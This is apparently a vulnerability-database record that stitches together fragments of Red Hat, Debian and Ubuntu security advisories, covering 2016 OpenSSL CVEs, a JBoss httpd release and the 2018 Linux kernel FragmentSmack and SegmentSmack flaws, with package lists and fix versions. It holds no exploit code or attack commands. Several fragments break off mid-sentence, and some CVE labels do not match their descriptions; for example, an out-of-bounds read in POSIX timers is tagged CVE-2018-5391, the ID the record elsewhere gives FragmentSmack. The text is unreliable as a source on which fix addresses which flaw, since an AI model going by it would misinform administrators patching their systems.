7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nppc64:\nopenssl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-2177\nhttps://access.redhat.com/security/cve/CVE-2016-2178\nhttps://access.redhat.com/security/cve/CVE-2016-2179\nhttps://access.redhat.com/security/cve/CVE-2016-2180\nhttps://access.redhat.com/security/cve/CVE-2016-2181\nhttps://access.redhat.com/security/cve/CVE-2016-2182\nhttps://access.redhat.com/security/cve/CVE-2016-6302\nhttps://access.redhat.com/security/cve/CVE-2016-6304\nhttps://access.redhat.com/security/cve/CVE-2016-6306\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://www.openssl.org/news/secadv/20160922.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI\nxpTW7ApBLmKhVjs49DGYouI=\n=4VgY\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. Additional information can be found at\n https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/ \n\nCVE-2016-2178\n\n Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing\n leak in the DSA code. \n\nCVE-2016-2179 / CVE-2016-2181\n\n Quan Luo and the OCAP audit team discovered denial of service\n vulnerabilities in DTLS. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1t-1+deb8u4. \n\nFor the unstable distribution (sid), these problems will be fixed soon. ==========================================================================\nUbuntu Security Notice USN-3087-2\nSeptember 23, 2016\n\nopenssl regression\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nUSN-3087-1 introduced a regression in OpenSSL. The fix for CVE-2016-2182 was\nincomplete and caused a regression when parsing certificates. This update\nfixes the problem. \n\nWe apologize for the inconvenience. This\n issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178)\n Quan Luo discovered that OpenSSL did not properly restrict the lifetime\n of queue entries in the DTLS implementation. (CVE-2016-2181)\n Shi Lei discovered that OpenSSL incorrectly validated division results. \n (CVE-2016-2182)\n Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES\n ciphers were vulnerable to birthday attacks. \n (CVE-2016-2183)\n Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303)\n Shi Lei discovered that OpenSSL incorrectly performed certain message\n length checks. (CVE-2016-6306)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libssl1.0.0 1.0.2g-1ubuntu4.5\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.21\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.38\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. Description:\n\nThis release adds the new Apache HTTP Server 2.4.29 packages that are part\nof the JBoss Core Services offering. \n\nThis release serves as a replacement for Red Hat JBoss Core Services\nApache HTTP Server 2.4.23, and includes bug fixes and enhancements. Refer\nto the Release Notes for information on the most significant bug fixes,\nenhancements and component upgrades included in this release. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-373 - Errata for httpd 2.4.29 GA RHEL 7\n\n7",
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VAR-201809-1153
Vulnerability from variot - Updated: 2026-03-09 23:25The Linux kernel, versions 3.9+, is vulnerable to a denial of service attack with low rates of specially modified packets targeting IP fragment re-assembly. An attacker may cause a denial of service condition by sending specially crafted IP fragments. Various vulnerabilities in IP fragmentation have been discovered and fixed over the years. The current vulnerability (CVE-2018-5391) became exploitable in the Linux kernel with the increase of the IP fragment reassembly queue size. Service disruption as a result (DoS) There is a possibility of being attacked. Linux Kernel is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition. (BZ#1632422)
- Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. ========================================================================== Ubuntu Security Notice USN-3742-3 August 21, 2018
linux-lts-trusty regressions
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 ESM
Summary:
USN-3742-2 introduced regressions in the Linux Hardware Enablement (HWE) kernel for Ubuntu 12.04 ESM.
Software Description: - linux-lts-trusty: Linux hardware enablement kernel from Trusty for Precise ESM
Details:
USN-3742-2 introduced mitigations in the Linux Hardware Enablement (HWE) kernel for Ubuntu 12.04 ESM to address L1 Terminal Fault (L1TF) vulnerabilities (CVE-2018-3620, CVE-2018-3646). Unfortunately, the update introduced regressions that caused kernel panics when booting in some environments as well as preventing Java applications from starting.
We apologize for the inconvenience.
Original advisory details:
It was discovered that memory present in the L1 data cache of an Intel CPU core may be exposed to a malicious process that is executing on the CPU core. This vulnerability is also known as L1 Terminal Fault (L1TF). A local attacker in a guest virtual machine could use this to expose sensitive information (memory from other guests or the host OS). (CVE-2018-3646)
It was discovered that memory present in the L1 data cache of an Intel CPU core may be exposed to a malicious process that is executing on the CPU core. This vulnerability is also known as L1 Terminal Fault (L1TF). A local attacker could use this to expose sensitive information (memory from the kernel or other processes). (CVE-2018-3620)
Andrey Konovalov discovered an out-of-bounds read in the POSIX timers subsystem in the Linux kernel. (CVE-2018-5391)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.04 ESM: linux-image-3.13.0-156-generic 3.13.0-156.206~precise1 linux-image-3.13.0-156-generic-lpae 3.13.0-156.206~precise1 linux-image-generic-lpae-lts-trusty 3.13.0.156.146 linux-image-generic-lts-trusty 3.13.0.156.146
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. 7.5) - ppc64, ppc64le, x86_64
Bug Fix(es):
These updated kernel packages include also numerous bug fixes. Space precludes documenting all of the bug fixes in this advisory. See the descriptions in the related Knowledge Article: https://access.redhat.com/articles/3674801
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2018:2924-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2018:2924 Issue date: 2018-10-16 CVE Names: CVE-2018-5390 CVE-2018-5391 CVE-2018-10675 CVE-2018-14634 ==================================================================== 1. Summary:
An update for kernel is now available for Red Hat Enterprise Linux 6.6 Advanced Update Support and Red Hat Enterprise Linux 6.6 Telco Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Server AUS (v. 6.6) - noarch, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.6) - x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 6.6) - x86_64 Red Hat Enterprise Linux Server TUS (v. 6.6) - noarch, x86_64
- Description:
The kernel packages contain the Linux kernel, the core of any Linux operating system.
Security Fix(es):
-
A flaw named SegmentSmack was found in the way the Linux kernel handled specially crafted TCP packets. A remote attacker could use this flaw to trigger time and calculation expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() functions by sending specially modified packets within ongoing TCP sessions which could lead to a CPU saturation and hence a denial of service on the system. Maintaining the denial of service condition requires continuous two-way TCP sessions to a reachable open port, thus the attacks cannot be performed using spoofed IP addresses. (CVE-2018-5390)
-
A flaw named FragmentSmack was found in the way the Linux kernel handled reassembly of fragmented IPv4 and IPv6 packets. (CVE-2018-5391)
-
kernel: mm: use-after-free in do_get_mempolicy function allows local DoS or other unspecified impact (CVE-2018-10675)
-
kernel: Integer overflow in Linux's create_elf_tables function (CVE-2018-14634)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Red Hat would like to thank Juha-Matti Tilli (Aalto University - Department of Communications and Networking and Nokia Bell Labs) for reporting CVE-2018-5390 and CVE-2018-5391 and Qualys Research Labs for reporting CVE-2018-14634.
Bug Fix(es):
-
After updating the system to prevent the L1 Terminal Fault (L1TF) vulnerability, only one thread was detected on systems that offer processing of two threads on a single processor core. With this update, the "__max_smt_threads()" function has been fixed. As a result, both threads are now detected correctly in the described situation. (BZ#1625334)
-
Previously, a kernel panic occurred when the kernel tried to make an out of bound access to the array that describes the L1 Terminal Fault (L1TF) mitigation state on systems without Extended Page Tables (EPT) support. This update extends the array of mitigation states to cover all the states, which effectively prevents out of bound array access. Also, this update enables rejecting invalid, irrelevant values, that might be erroneously provided by the userspace. As a result, the kernel no longer panics in the described scenario. (BZ#1629633)
-
Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1575065 - CVE-2018-10675 kernel: mm: use-after-free in do_get_mempolicy function allows local DoS or other unspecified impact 1601704 - CVE-2018-5390 kernel: TCP segments with random offsets allow a remote denial of service (SegmentSmack) 1609664 - CVE-2018-5391 kernel: IP fragments with random offsets allow a remote denial of service (FragmentSmack) 1624498 - CVE-2018-14634 kernel: Integer overflow in Linux's create_elf_tables function
- Package List:
Red Hat Enterprise Linux Server AUS (v. 6.6):
Source: kernel-2.6.32-504.76.2.el6.src.rpm
noarch: kernel-abi-whitelists-2.6.32-504.76.2.el6.noarch.rpm kernel-doc-2.6.32-504.76.2.el6.noarch.rpm kernel-firmware-2.6.32-504.76.2.el6.noarch.rpm
x86_64: kernel-2.6.32-504.76.2.el6.x86_64.rpm kernel-debug-2.6.32-504.76.2.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm kernel-debug-devel-2.6.32-504.76.2.el6.x86_64.rpm kernel-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-504.76.2.el6.x86_64.rpm kernel-devel-2.6.32-504.76.2.el6.x86_64.rpm kernel-headers-2.6.32-504.76.2.el6.x86_64.rpm perf-2.6.32-504.76.2.el6.x86_64.rpm perf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm python-perf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm
Red Hat Enterprise Linux Server TUS (v. 6.6):
Source: kernel-2.6.32-504.76.2.el6.src.rpm
noarch: kernel-abi-whitelists-2.6.32-504.76.2.el6.noarch.rpm kernel-doc-2.6.32-504.76.2.el6.noarch.rpm kernel-firmware-2.6.32-504.76.2.el6.noarch.rpm
x86_64: kernel-2.6.32-504.76.2.el6.x86_64.rpm kernel-debug-2.6.32-504.76.2.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm kernel-debug-devel-2.6.32-504.76.2.el6.x86_64.rpm kernel-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-504.76.2.el6.x86_64.rpm kernel-devel-2.6.32-504.76.2.el6.x86_64.rpm kernel-headers-2.6.32-504.76.2.el6.x86_64.rpm perf-2.6.32-504.76.2.el6.x86_64.rpm perf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm python-perf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 6.6):
x86_64: kernel-debug-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm kernel-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-504.76.2.el6.x86_64.rpm perf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm python-perf-2.6.32-504.76.2.el6.x86_64.rpm python-perf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm
Red Hat Enterprise Linux Server Optional TUS (v. 6.6):
x86_64: kernel-debug-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm kernel-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-504.76.2.el6.x86_64.rpm perf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm python-perf-2.6.32-504.76.2.el6.x86_64.rpm python-perf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2018-5390 https://access.redhat.com/security/cve/CVE-2018-5391 https://access.redhat.com/security/cve/CVE-2018-10675 https://access.redhat.com/security/cve/CVE-2018-14634 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/articles/3553061 https://access.redhat.com/security/vulnerabilities/mutagen-astronomy
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
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"data": "The Linux kernel, versions 3.9+, is vulnerable to a denial of service attack with low rates of specially modified packets targeting IP fragment re-assembly. An attacker may cause a denial of service condition by sending specially crafted IP fragments. Various vulnerabilities in IP fragmentation have been discovered and fixed over the years. The current vulnerability (CVE-2018-5391) became exploitable in the Linux kernel with the increase of the IP fragment reassembly queue size. Service disruption as a result (DoS) There is a possibility of being attacked. Linux Kernel is prone to a remote denial-of-service vulnerability. \nAn attacker can exploit this issue to cause a denial-of-service condition. \n(BZ#1632422)\n\n4. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. ==========================================================================\nUbuntu Security Notice USN-3742-3\nAugust 21, 2018\n\nlinux-lts-trusty regressions\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 ESM\n\nSummary:\n\nUSN-3742-2 introduced regressions in the Linux Hardware Enablement\n(HWE) kernel for Ubuntu 12.04 ESM. \n\nSoftware Description:\n- linux-lts-trusty: Linux hardware enablement kernel from Trusty for Precise ESM\n\nDetails:\n\nUSN-3742-2 introduced mitigations in the Linux Hardware Enablement\n(HWE) kernel for Ubuntu 12.04 ESM to address L1 Terminal Fault (L1TF)\nvulnerabilities (CVE-2018-3620, CVE-2018-3646). Unfortunately, the\nupdate introduced regressions that caused kernel panics when booting\nin some environments as well as preventing Java applications from\nstarting. \n\nWe apologize for the inconvenience. \n\nOriginal advisory details:\n\n It was discovered that memory present in the L1 data cache of an Intel CPU\n core may be exposed to a malicious process that is executing on the CPU\n core. This vulnerability is also known as L1 Terminal Fault (L1TF). A local\n attacker in a guest virtual machine could use this to expose sensitive\n information (memory from other guests or the host OS). (CVE-2018-3646)\n\n It was discovered that memory present in the L1 data cache of an Intel CPU\n core may be exposed to a malicious process that is executing on the CPU\n core. This vulnerability is also known as L1 Terminal Fault (L1TF). A local\n attacker could use this to expose sensitive information (memory from the\n kernel or other processes). (CVE-2018-3620)\n\n Andrey Konovalov discovered an out-of-bounds read in the POSIX\n timers subsystem in the Linux kernel. (CVE-2018-5391)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 ESM:\n linux-image-3.13.0-156-generic 3.13.0-156.206~precise1\n linux-image-3.13.0-156-generic-lpae 3.13.0-156.206~precise1\n linux-image-generic-lpae-lts-trusty 3.13.0.156.146\n linux-image-generic-lts-trusty 3.13.0.156.146\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 7.5) - ppc64, ppc64le, x86_64\n\n3. \n\nBug Fix(es):\n\nThese updated kernel packages include also numerous bug fixes. Space\nprecludes documenting all of the bug fixes in this advisory. See the\ndescriptions in the related Knowledge Article:\nhttps://access.redhat.com/articles/3674801\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: kernel security and bug fix update\nAdvisory ID: RHSA-2018:2924-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2018:2924\nIssue date: 2018-10-16\nCVE Names: CVE-2018-5390 CVE-2018-5391 CVE-2018-10675\n CVE-2018-14634\n====================================================================\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6.6\nAdvanced Update Support and Red Hat Enterprise Linux 6.6 Telco Extended\nUpdate Support. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Server AUS (v. 6.6) - noarch, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.6) - x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 6.6) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 6.6) - noarch, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nSecurity Fix(es):\n\n* A flaw named SegmentSmack was found in the way the Linux kernel handled\nspecially crafted TCP packets. A remote attacker could use this flaw to\ntrigger time and calculation expensive calls to tcp_collapse_ofo_queue()\nand tcp_prune_ofo_queue() functions by sending specially modified packets\nwithin ongoing TCP sessions which could lead to a CPU saturation and hence\na denial of service on the system. Maintaining the denial of service\ncondition requires continuous two-way TCP sessions to a reachable open\nport, thus the attacks cannot be performed using spoofed IP addresses. \n(CVE-2018-5390)\n\n* A flaw named FragmentSmack was found in the way the Linux kernel handled\nreassembly of fragmented IPv4 and IPv6 packets. (CVE-2018-5391)\n\n* kernel: mm: use-after-free in do_get_mempolicy function allows local DoS\nor other unspecified impact (CVE-2018-10675)\n\n* kernel: Integer overflow in Linux\u0027s create_elf_tables function\n(CVE-2018-14634)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nRed Hat would like to thank Juha-Matti Tilli (Aalto University - Department\nof Communications and Networking and Nokia Bell Labs) for reporting\nCVE-2018-5390 and CVE-2018-5391 and Qualys Research Labs for reporting\nCVE-2018-14634. \n\nBug Fix(es):\n\n* After updating the system to prevent the L1 Terminal Fault (L1TF)\nvulnerability, only one thread was detected on systems that offer\nprocessing of two threads on a single processor core. With this update, the\n\"__max_smt_threads()\" function has been fixed. As a result, both threads\nare now detected correctly in the described situation. (BZ#1625334)\n\n* Previously, a kernel panic occurred when the kernel tried to make an out\nof bound access to the array that describes the L1 Terminal Fault (L1TF)\nmitigation state on systems without Extended Page Tables (EPT) support. \nThis update extends the array of mitigation states to cover all the states,\nwhich effectively prevents out of bound array access. Also, this update\nenables rejecting invalid, irrelevant values, that might be erroneously\nprovided by the userspace. As a result, the kernel no longer panics in the\ndescribed scenario. (BZ#1629633)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1575065 - CVE-2018-10675 kernel: mm: use-after-free in do_get_mempolicy function allows local DoS or other unspecified impact\n1601704 - CVE-2018-5390 kernel: TCP segments with random offsets allow a remote denial of service (SegmentSmack)\n1609664 - CVE-2018-5391 kernel: IP fragments with random offsets allow a remote denial of service (FragmentSmack)\n1624498 - CVE-2018-14634 kernel: Integer overflow in Linux\u0027s create_elf_tables function\n\n6. Package List:\n\nRed Hat Enterprise Linux Server AUS (v. 6.6):\n\nSource:\nkernel-2.6.32-504.76.2.el6.src.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-504.76.2.el6.noarch.rpm\nkernel-doc-2.6.32-504.76.2.el6.noarch.rpm\nkernel-firmware-2.6.32-504.76.2.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-debug-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-devel-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-headers-2.6.32-504.76.2.el6.x86_64.rpm\nperf-2.6.32-504.76.2.el6.x86_64.rpm\nperf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server TUS (v. 6.6):\n\nSource:\nkernel-2.6.32-504.76.2.el6.src.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-504.76.2.el6.noarch.rpm\nkernel-doc-2.6.32-504.76.2.el6.noarch.rpm\nkernel-firmware-2.6.32-504.76.2.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-debug-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-devel-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-headers-2.6.32-504.76.2.el6.x86_64.rpm\nperf-2.6.32-504.76.2.el6.x86_64.rpm\nperf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional AUS (v. 6.6):\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-504.76.2.el6.x86_64.rpm\nperf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\npython-perf-2.6.32-504.76.2.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional TUS (v. 6.6):\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-504.76.2.el6.x86_64.rpm\nperf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\npython-perf-2.6.32-504.76.2.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-504.76.2.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-5390\nhttps://access.redhat.com/security/cve/CVE-2018-5391\nhttps://access.redhat.com/security/cve/CVE-2018-10675\nhttps://access.redhat.com/security/cve/CVE-2018-14634\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/articles/3553061\nhttps://access.redhat.com/security/vulnerabilities/mutagen-astronomy\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG 